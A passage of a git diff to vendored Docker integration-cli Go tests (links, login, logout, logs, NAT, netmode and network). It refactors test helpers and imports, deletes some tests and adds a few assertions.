hosts file c.Assert(string(contentTwo), checker.Contains, "onetwo") } @@ -162,8 +163,7 @@ func (s *DockerSuite) TestLinksUpdateOnRestart(c *check.C) { id := strings.TrimSpace(string(out)) realIP := inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress") - content, err := readContainerFileWithExec(id, "/etc/hosts") - c.Assert(err, checker.IsNil) + content := readContainerFileWithExec(c, id, "/etc/hosts") getIP := func(hosts []byte, hostname string) string { re := regexp.MustCompile(fmt.Sprintf(`(\S*)\t%s`, regexp.QuoteMeta(hostname))) @@ -180,8 +180,7 @@ func (s *DockerSuite) TestLinksUpdateOnRestart(c *check.C) { dockerCmd(c, "restart", "one") realIP = inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress") - content, err = readContainerFileWithExec(id, "/etc/hosts") - c.Assert(err, checker.IsNil, check.Commentf("content: %s", string(content))) + content = readContainerFileWithExec(c, id, "/etc/hosts") ip = getIP(content, "one") c.Assert(ip, checker.Equals, realIP) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go deleted file mode 100644 index 1af927930d..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go +++ /dev/null @@ -1,26 +0,0 @@ -// +build !windows - -package main - -import ( - "io/ioutil" - "os" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestLinksEtcHostsContentMatch(c *check.C) { - // In a _unix file as using Unix specific files, and must be on the - // same host as the daemon. - testRequires(c, SameHostDaemon, NotUserNamespace) - - out, _ := dockerCmd(c, "run", "--net=host", "busybox", "cat", "/etc/hosts") - hosts, err := ioutil.ReadFile("/etc/hosts") - if os.IsNotExist(err) { - c.Skip("/etc/hosts does not exist, skip this test") - } - - c.Assert(out, checker.Equals, string(hosts), check.Commentf("container: %s\n\nhost:%s", out, hosts)) - -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go index 01de75d985..cb261bed85 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go @@ -4,7 +4,7 @@ import ( "bytes" "os/exec" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) @@ -16,29 +16,15 @@ func (s *DockerSuite) TestLoginWithoutTTY(c *check.C) { // run the command and block until it's done err := cmd.Run() - c.Assert(err, checker.NotNil) //"Expected non nil err when loginning in & TTY not available" + c.Assert(err, checker.NotNil) //"Expected non nil err when logging in & TTY not available" } func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistry(c *check.C) { // wrong credentials - out, _, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", privateRegistryURL) + out, _, err := dockerCmdWithError("login", "-u", s.reg.Username(), "-p", "WRONGPASSWORD", privateRegistryURL) c.Assert(err, checker.NotNil, check.Commentf(out)) c.Assert(out, checker.Contains, "401 Unauthorized") // now it's fine - dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) -} - -func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistryDeprecatedEmailFlag(c *check.C) { - // Test to make sure login still works with the deprecated -e and --email flags - // wrong credentials - out, _, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", "-e", s.reg.email, privateRegistryURL) - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "401 Unauthorized") - - // now it's fine - // -e flag - dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "-e", s.reg.email, privateRegistryURL) - // --email flag - dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "--email", s.reg.email, privateRegistryURL) + dockerCmd(c, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go index a5f4b108cf..e0752f489c 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go @@ -8,11 +8,13 @@ import ( "os/exec" "path/filepath" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C) { + s.d.StartWithBusybox(c) + osPath := os.Getenv("PATH") defer os.Setenv("PATH", osPath) @@ -28,6 +30,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C) tmp, err := ioutil.TempDir("", "integration-cli-") c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmp) externalAuthConfig := `{ "credsStore": "shell-test" }` @@ -35,26 +38,29 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C) err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) c.Assert(err, checker.IsNil) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + _, err = s.d.Cmd("--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) + c.Assert(err, checker.IsNil) b, err := ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":") c.Assert(string(b), checker.Contains, privateRegistryURL) - dockerCmd(c, "--config", tmp, "tag", "busybox", repoName) - dockerCmd(c, "--config", tmp, "push", repoName) - - dockerCmd(c, "--config", tmp, "logout", privateRegistryURL) + _, err = s.d.Cmd("--config", tmp, "tag", "busybox", repoName) + c.Assert(err, checker.IsNil) + _, err = s.d.Cmd("--config", tmp, "push", repoName) + c.Assert(err, checker.IsNil) + _, err = s.d.Cmd("--config", tmp, "logout", privateRegistryURL) + c.Assert(err, checker.IsNil) b, err = ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) c.Assert(string(b), checker.Not(checker.Contains), privateRegistryURL) // check I cannot pull anymore - out, _, err := dockerCmdWithError("--config", tmp, "pull", repoName) + out, err := s.d.Cmd("--config", tmp, "pull", repoName) c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Error: image dockercli/busybox:authtest not found") + c.Assert(out, checker.Contains, "no basic auth credentials") } // #23100 @@ -71,7 +77,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithWrongHostnamesStored(c * os.Setenv("PATH", testPath) cmd := exec.Command("docker-credential-shell-test", "store") - stdin := bytes.NewReader([]byte(fmt.Sprintf(`{"ServerURL": "https://%s", "Username": "%s", "Secret": "%s"}`, privateRegistryURL, s.reg.username, s.reg.password))) + stdin := bytes.NewReader([]byte(fmt.Sprintf(`{"ServerURL": "https://%s", "Username": "%s", "Secret": "%s"}`, privateRegistryURL, s.reg.Username(), s.reg.Password()))) cmd.Stdin = stdin c.Assert(cmd.Run(), checker.IsNil) @@ -84,7 +90,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithWrongHostnamesStored(c * err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) c.Assert(err, checker.IsNil) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) b, err := ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go index d2dcad1052..17ee5deaad 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go @@ -8,47 +8,33 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/pkg/jsonmessage" "github.com/go-check/check" + "gotest.tools/icmd" ) // This used to work, it test a log of PageSize-1 (gh#4851) func (s *DockerSuite) TestLogsContainerSmallerThanPage(c *check.C) { - testLen := 32767 - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) - - id := strings.TrimSpace(out) - dockerCmd(c, "wait", id) - - out, _ = dockerCmd(c, "logs", id) - - c.Assert(out, checker.HasLen, testLen+1) + testLogsContainerPagination(c, 32767) } // Regression test: When going over the PageSize, it used to panic (gh#4851) func (s *DockerSuite) TestLogsContainerBiggerThanPage(c *check.C) { - testLen := 32768 - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) - - id := strings.TrimSpace(out) - dockerCmd(c, "wait", id) - - out, _ = dockerCmd(c, "logs", id) - - c.Assert(out, checker.HasLen, testLen+1) + testLogsContainerPagination(c, 32768) } // Regression test: When going much over the PageSize, it used to block (gh#4851) func (s *DockerSuite) TestLogsContainerMuchBiggerThanPage(c *check.C) { - testLen := 33000 - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) + testLogsContainerPagination(c, 33000) +} +func testLogsContainerPagination(c *check.C, testLen int) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen)) id := strings.TrimSpace(out) dockerCmd(c, "wait", id) - out, _ = dockerCmd(c, "logs", id) - c.Assert(out, checker.HasLen, testLen+1) } @@ -69,7 +55,7 @@ func (s *DockerSuite) TestLogsTimestamps(c *check.C) { for _, l := range lines { if l != "" { - _, err := time.Parse(jsonlog.RFC3339NanoFixed+" ", ts.FindString(l)) + _, err := time.Parse(jsonmessage.RFC3339NanoFixed+" ", ts.FindString(l)) c.Assert(err, checker.IsNil, check.Commentf("Failed to parse timestamp from %v", l)) // ensure we have padded 0's c.Assert(l[29], checker.Equals, uint8('Z')) @@ -79,18 +65,13 @@ func (s *DockerSuite) TestLogsTimestamps(c *check.C) { func (s *DockerSuite) TestLogsSeparateStderr(c *check.C) { msg := "stderr_log" - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)) - + out := cli.DockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)).Combined() id := strings.TrimSpace(out) - dockerCmd(c, "wait", id) - - stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id) - - c.Assert(stdout, checker.Equals, "") - - stderr = strings.TrimSpace(stderr) - - c.Assert(stderr, checker.Equals, msg) + cli.DockerCmd(c, "wait", id) + cli.DockerCmd(c, "logs", id).Assert(c, icmd.Expected{ + Out: "", + Err: msg, + }) } func (s *DockerSuite) TestLogsStderrInStdout(c *check.C) { @@ -98,54 +79,51 @@ func (s *DockerSuite) TestLogsStderrInStdout(c *check.C) { // a bunch of ANSI escape sequences before the "stderr_log" message. testRequires(c, DaemonIsLinux) msg := "stderr_log" - out, _ := dockerCmd(c, "run", "-d", "-t", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)) - + out := cli.DockerCmd(c, "run", "-d", "-t", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)).Combined() id := strings.TrimSpace(out) - dockerCmd(c, "wait", id) - - stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id) - c.Assert(stderr, checker.Equals, "") + cli.DockerCmd(c, "wait", id) - stdout = strings.TrimSpace(stdout) - c.Assert(stdout, checker.Equals, msg) + cli.DockerCmd(c, "logs", id).Assert(c, icmd.Expected{ + Out: msg, + Err: "", + }) } func (s *DockerSuite) TestLogsTail(c *check.C) { testLen := 100 - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo =; done;", testLen)) + out := cli.DockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo =; done;", testLen)).Combined() id := strings.TrimSpace(out) - dockerCmd(c, "wait", id) + cli.DockerCmd(c, "wait", id) - out, _ = dockerCmd(c, "logs", "--tail", "0", id) + out = cli.DockerCmd(c, "logs", "--tail", "0", id).Combined() lines := strings.Split(out, "\n") c.Assert(lines, checker.HasLen, 1) - out, _ = dockerCmd(c, "logs", "--tail", "5", id) + out = cli.DockerCmd(c, "logs", "--tail", "5", id).Combined() lines = strings.Split(out, "\n") c.Assert(lines, checker.HasLen, 6) - out, _ = dockerCmd(c, "logs", "--tail", "99", id) + out = cli.DockerCmd(c, "logs", "--tail", "99", id).Combined() lines = strings.Split(out, "\n") c.Assert(lines, checker.HasLen, 100) - out, _ = dockerCmd(c, "logs", "--tail", "all", id) + out = cli.DockerCmd(c, "logs", "--tail", "all", id).Combined() lines = strings.Split(out, "\n") c.Assert(lines, checker.HasLen, testLen+1) - out, _ = dockerCmd(c, "logs", "--tail", "-1", id) + out = cli.DockerCmd(c, "logs", "--tail", "-1", id).Combined() lines = strings.Split(out, "\n") c.Assert(lines, checker.HasLen, testLen+1) - out, _, _ = dockerCmdWithStdoutStderr(c, "logs", "--tail", "random", id) + out = cli.DockerCmd(c, "logs", "--tail", "random", id).Combined() lines = strings.Split(out, "\n") c.Assert(lines, checker.HasLen, testLen+1) } func (s *DockerSuite) TestLogsFollowStopped(c *check.C) { dockerCmd(c, "run", "--name=test", "busybox", "echo", "hello") - id, err := getIDByName("test") - c.Assert(err, check.IsNil) + id := getIDByName(c, "test") logsCmd := exec.Command(dockerBinary, "logs", "-f", id) c.Assert(logsCmd.Start(), checker.IsNil) @@ -187,14 +165,14 @@ func (s *DockerSuite) TestLogsSince(c *check.C) { // Test with default value specified and parameter omitted expected := []string{"log1", "log2", "log3"} - for _, cmd := range []*exec.Cmd{ - exec.Command(dockerBinary, "logs", "-t", name), - exec.Command(dockerBinary, "logs", "-t", "--since=0", name), + for _, cmd := range [][]string{ + {"logs", "-t", name}, + {"logs", "-t", "--since=0", name}, } { - out, _, err = runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to log container: %s", out)) + result := icmd.RunCommand(dockerBinary, cmd...) + result.Assert(c, icmd.Success) for _, v := range expected { - c.Assert(out, checker.Contains, v) + c.Assert(result.Combined(), checker.Contains, v) } } } @@ -236,14 +214,15 @@ func (s *DockerSuite) TestLogsSinceFutureFollow(c *check.C) { func (s *DockerSuite) TestLogsFollowSlowStdoutConsumer(c *check.C) { // TODO Windows: Fix this test for TP5. testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", `usleep 600000;yes X | head -c 200000`) + expected := 150000 + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", fmt.Sprintf("usleep 600000; yes X | head -c %d", expected)) id := strings.TrimSpace(out) stopSlowRead := make(chan bool) go func() { - exec.Command(dockerBinary, "wait", id).Run() + dockerCmd(c, "wait", id) stopSlowRead <- true }() @@ -251,20 +230,45 @@ func (s *DockerSuite) TestLogsFollowSlowStdoutConsumer(c *check.C) { stdout, err := logCmd.StdoutPipe() c.Assert(err, checker.IsNil) c.Assert(logCmd.Start(), checker.IsNil) + defer func() { go logCmd.Wait() }() // First read slowly - bytes1, err := consumeWithSpeed(stdout, 10, 50*time.Millisecond, stopSlowRead) + bytes1, err := ConsumeWithSpeed(stdout, 10, 50*time.Millisecond, stopSlowRead) c.Assert(err, checker.IsNil) // After the container has finished we can continue reading fast - bytes2, err := consumeWithSpeed(stdout, 32*1024, 0, nil) + bytes2, err := ConsumeWithSpeed(stdout, 32*1024, 0, nil) c.Assert(err, checker.IsNil) + c.Assert(logCmd.Wait(), checker.IsNil) + actual := bytes1 + bytes2 - expected := 200000 c.Assert(actual, checker.Equals, expected) } +// ConsumeWithSpeed reads chunkSize bytes from reader before sleeping +// for interval duration. Returns total read bytes. Send true to the +// stop channel to return before reading to EOF on the reader. +func ConsumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) { + buffer := make([]byte, chunkSize) + for { + var readBytes int + readBytes, err = reader.Read(buffer) + n += readBytes + if err != nil { + if err == io.EOF { + err = nil + } + return + } + select { + case <-stop: + return + case <-time.After(interval): + } + } +} + func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) { out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true; do echo hello; sleep 2; done") id := strings.TrimSpace(out) @@ -276,6 +280,7 @@ func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) { r, w := io.Pipe() cmd.Stdout = w c.Assert(cmd.Start(), checker.IsNil) + go cmd.Wait() // Make sure pipe is written to chErr := make(chan error) @@ -286,7 +291,8 @@ func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) { }() c.Assert(<-chErr, checker.IsNil) c.Assert(cmd.Process.Kill(), checker.IsNil) - + r.Close() + cmd.Wait() // NGoroutines is not updated right away, so we need to wait before failing c.Assert(waitForGoroutines(nroutines), checker.IsNil) } @@ -300,8 +306,10 @@ func (s *DockerSuite) TestLogsFollowGoroutinesNoOutput(c *check.C) { c.Assert(err, checker.IsNil) cmd := exec.Command(dockerBinary, "logs", "-f", id) c.Assert(cmd.Start(), checker.IsNil) + go cmd.Wait() time.Sleep(200 * time.Millisecond) c.Assert(cmd.Process.Kill(), checker.IsNil) + cmd.Wait() // NGoroutines is not updated right away, so we need to wait before failing c.Assert(waitForGoroutines(nroutines), checker.IsNil) @@ -310,8 +318,8 @@ func (s *DockerSuite) TestLogsFollowGoroutinesNoOutput(c *check.C) { func (s *DockerSuite) TestLogsCLIContainerNotFound(c *check.C) { name := "testlogsnocontainer" out, _, _ := dockerCmdWithError("logs", name) - message := fmt.Sprintf("Error: No such container: %s\n", name) - c.Assert(out, checker.Equals, message) + message := fmt.Sprintf("No such container: %s\n", name) + c.Assert(out, checker.Contains, message) } func (s *DockerSuite) TestLogsWithDetails(c *check.C) { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go deleted file mode 100644 index 7f4cc2cbd7..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go +++ /dev/null @@ -1,93 +0,0 @@ -package main - -import ( - "fmt" - "io/ioutil" - "net" - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func startServerContainer(c *check.C, msg string, port int) string { - name := "server" - cmd := []string{ - "-d", - "-p", fmt.Sprintf("%d:%d", port, port), - "busybox", - "sh", "-c", fmt.Sprintf("echo %q | nc -lp %d", msg, port), - } - c.Assert(waitForContainer(name, cmd...), check.IsNil) - return name -} - -func getExternalAddress(c *check.C) net.IP { - iface, err := net.InterfaceByName("eth0") - if err != nil { - c.Skip(fmt.Sprintf("Test not running with `make test`. Interface eth0 not found: %v", err)) - } - - ifaceAddrs, err := iface.Addrs() - c.Assert(err, check.IsNil) - c.Assert(ifaceAddrs, checker.Not(checker.HasLen), 0) - - ifaceIP, _, err := net.ParseCIDR(ifaceAddrs[0].String()) - c.Assert(err, check.IsNil) - - return ifaceIP -} - -func getContainerLogs(c *check.C, containerID string) string { - out, _ := dockerCmd(c, "logs", containerID) - return strings.Trim(out, "\r\n") -} - -func getContainerStatus(c *check.C, containerID string) string { - out := inspectField(c, containerID, "State.Running") - return out -} - -func (s *DockerSuite) TestNetworkNat(c *check.C) { - testRequires(c, DaemonIsLinux, SameHostDaemon) - msg := "it works" - startServerContainer(c, msg, 8080) - endpoint := getExternalAddress(c) - conn, err := net.Dial("tcp", fmt.Sprintf("%s:%d", endpoint.String(), 8080)) - c.Assert(err, check.IsNil) - - data, err := ioutil.ReadAll(conn) - conn.Close() - c.Assert(err, check.IsNil) - - final := strings.TrimRight(string(data), "\n") - c.Assert(final, checker.Equals, msg) -} - -func (s *DockerSuite) TestNetworkLocalhostTCPNat(c *check.C) { - testRequires(c, DaemonIsLinux, SameHostDaemon) - var ( - msg = "hi yall" - ) - startServerContainer(c, msg, 8081) - conn, err := net.Dial("tcp", "localhost:8081") - c.Assert(err, check.IsNil) - - data, err := ioutil.ReadAll(conn) - conn.Close() - c.Assert(err, check.IsNil) - - final := strings.TrimRight(string(data), "\n") - c.Assert(final, checker.Equals, msg) -} - -func (s *DockerSuite) TestNetworkLoopbackNat(c *check.C) { - testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) - msg := "it works" - startServerContainer(c, msg, 8080) - endpoint := getExternalAddress(c) - out, _ := dockerCmd(c, "run", "-t", "--net=container:server", "busybox", - "sh", "-c", fmt.Sprintf("stty raw && nc -w 5 %s 8080", endpoint.String())) - final := strings.TrimRight(string(out), "\n") - c.Assert(final, checker.Equals, msg) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go index 4dfad937b5..76f9898d88 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go @@ -1,7 +1,9 @@ package main import ( - "github.com/docker/docker/pkg/integration/checker" + "strings" + + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/runconfig" "github.com/go-check/check" ) @@ -44,10 +46,10 @@ func (s *DockerSuite) TestNetHostname(c *check.C) { c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkHostname.Error()) out, _ = dockerCmdWithFail(c, "run", "--net=container", "busybox", "ps") - c.Assert(out, checker.Contains, "--net: invalid net mode: invalid container format container:") + c.Assert(out, checker.Contains, "invalid container format container:") out, _ = dockerCmdWithFail(c, "run", "--net=weird", "busybox", "ps") - c.Assert(out, checker.Contains, "network weird not found") + c.Assert(strings.ToLower(out), checker.Contains, "not found") } func (s *DockerSuite) TestConflictContainerNetworkAndLinks(c *check.C) { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go index 97f204ab47..95f7ccfff0 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go @@ -10,14 +10,15 @@ import ( "net/http" "net/http/httptest" "os" - "path/filepath" "strings" "time" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/versions/v1p20" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/runconfig" "github.com/docker/libnetwork/driverapi" @@ -27,6 +28,8 @@ import ( "github.com/docker/libnetwork/netlabel" "github.com/go-check/check" "github.com/vishvananda/netlink" + "golang.org/x/sys/unix" + "gotest.tools/icmd" ) const dummyNetworkDriver = "dummy-network-driver" @@ -43,16 +46,18 @@ func init() { type DockerNetworkSuite struct { server *httptest.Server ds *DockerSuite - d *Daemon + d *daemon.Daemon } func (s *DockerNetworkSuite) SetUpTest(c *check.C) { - s.d = NewDaemon(c) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) } func (s *DockerNetworkSuite) TearDownTest(c *check.C) { - s.d.Stop() - s.ds.TearDownTest(c) + if s.d != nil { + s.d.Stop(c) + s.ds.TearDownTest(c) + } } func (s *DockerNetworkSuite) SetUpSuite(c *check.C) { @@ -268,7 +273,7 @@ func assertNwList(c *check.C, out string, expectNws []string) { func getNwResource(c *check.C, name string) *types.NetworkResource { out, _ := dockerCmd(c, "network", "inspect", name) - nr := []types.NetworkResource{} + var nr []types.NetworkResource err := json.Unmarshal([]byte(out), &nr) c.Assert(err, check.IsNil) return &nr[0] @@ -281,39 +286,6 @@ func (s *DockerNetworkSuite) TestDockerNetworkLsDefault(c *check.C) { } } -func (s *DockerSuite) TestNetworkLsFormat(c *check.C) { - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "network", "ls", "--format", "{{.Name}}") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - - expected := []string{"bridge", "host", "none"} - var names []string - names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) -} - -func (s *DockerSuite) TestNetworkLsFormatDefaultFormat(c *check.C) { - testRequires(c, DaemonIsLinux) - - config := `{ - "networksFormat": "{{ .Name }} default" -}` - d, err := ioutil.TempDir("", "integration-cli-") - c.Assert(err, checker.IsNil) - defer os.RemoveAll(d) - - err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) - c.Assert(err, checker.IsNil) - - out, _ := dockerCmd(c, "--config", d, "network", "ls") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - - expected := []string{"bridge default", "host default", "none default"} - var names []string - names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) -} - func (s *DockerNetworkSuite) TestDockerNetworkCreatePredefined(c *check.C) { predefined := []string{"bridge", "host", "none", "default"} for _, net := range predefined { @@ -327,7 +299,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkCreateHostBind(c *check.C) { dockerCmd(c, "network", "create", "--subnet=192.168.10.0/24", "--gateway=192.168.10.1", "-o", "com.docker.network.bridge.host_binding_ipv4=192.168.10.1", "testbind") assertNwIsAvailable(c, "testbind") - out, _ := runSleepingContainer(c, "--net=testbind", "-p", "5000:5000") + out := runSleepingContainer(c, "--net=testbind", "-p", "5000:5000") id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) out, _ = dockerCmd(c, "ps") @@ -344,6 +316,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkRmPredefined(c *check.C) { } func (s *DockerNetworkSuite) TestDockerNetworkLsFilter(c *check.C) { + testRequires(c, OnlyDefaultNetworks) testNet := "testnet1" testLabel := "foo" testValue := "bar" @@ -453,7 +426,7 @@ func (s *DockerSuite) TestDockerNetworkDeleteMultiple(c *check.C) { func (s *DockerSuite) TestDockerNetworkInspect(c *check.C) { out, _ := dockerCmd(c, "network", "inspect", "host") - networkResources := []types.NetworkResource{} + var networkResources []types.NetworkResource err := json.Unmarshal([]byte(out), &networkResources) c.Assert(err, check.IsNil) c.Assert(networkResources, checker.HasLen, 1) @@ -475,32 +448,51 @@ func (s *DockerSuite) TestDockerNetworkInspectWithID(c *check.C) { func (s *DockerSuite) TestDockerInspectMultipleNetwork(c *check.C) { result := dockerCmdWithResult("network", "inspect", "host", "none") - c.Assert(result, icmd.Matches, icmd.Success) + result.Assert(c, icmd.Success) - networkResources := []types.NetworkResource{} + var networkResources []types.NetworkResource err := json.Unmarshal([]byte(result.Stdout()), &networkResources) c.Assert(err, check.IsNil) c.Assert(networkResources, checker.HasLen, 2) +} - // Should print an error, return an exitCode 1 *but* should print the host network - result = dockerCmdWithResult("network", "inspect", "host", "nonexistent") - c.Assert(result, icmd.Matches, icmd.Expected{ +func (s *DockerSuite) TestDockerInspectMultipleNetworksIncludingNonexistent(c *check.C) { + // non-existent network was not at the beginning of the inspect list + // This should print an error, return an exitCode 1 and print the host network + result := dockerCmdWithResult("network", "inspect", "host", "nonexistent") + result.Assert(c, icmd.Expected{ ExitCode: 1, Err: "Error: No such network: nonexistent", Out: "host", }) - networkResources = []types.NetworkResource{} - err = json.Unmarshal([]byte(result.Stdout()), &networkResources) + var networkResources []types.NetworkResource + err := json.Unmarshal([]byte(result.Stdout()), &networkResources) + c.Assert(err, check.IsNil) c.Assert(networkResources, checker.HasLen, 1) + // Only one non-existent network to inspect // Should print an error and return an exitCode, nothing else result = dockerCmdWithResult("network", "inspect", "nonexistent") - c.Assert(result, icmd.Matches, icmd.Expected{ + result.Assert(c, icmd.Expected{ ExitCode: 1, Err: "Error: No such network: nonexistent", Out: "[]", }) + + // non-existent network was at the beginning of the inspect list + // Should not fail fast, and still print host network but print an error + result = dockerCmdWithResult("network", "inspect", "nonexistent", "host") + result.Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Error: No such network: nonexistent", + Out: "host", + }) + + networkResources = []types.NetworkResource{} + err = json.Unmarshal([]byte(result.Stdout()), &networkResources) + c.Assert(err, check.IsNil) + c.Assert(networkResources, checker.HasLen, 1) } func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) { @@ -520,7 +512,7 @@ func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) { }() out, _ = dockerCmd(c, "network", "inspect", "brNetForInspect") - networkResources := []types.NetworkResource{} + var networkResources []types.NetworkResource err := json.Unmarshal([]byte(out), &networkResources) c.Assert(err, check.IsNil) c.Assert(networkResources, checker.HasLen, 1) @@ -534,7 +526,7 @@ func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) { // check whether network inspect works properly out, _ = dockerCmd(c, "network", "inspect", 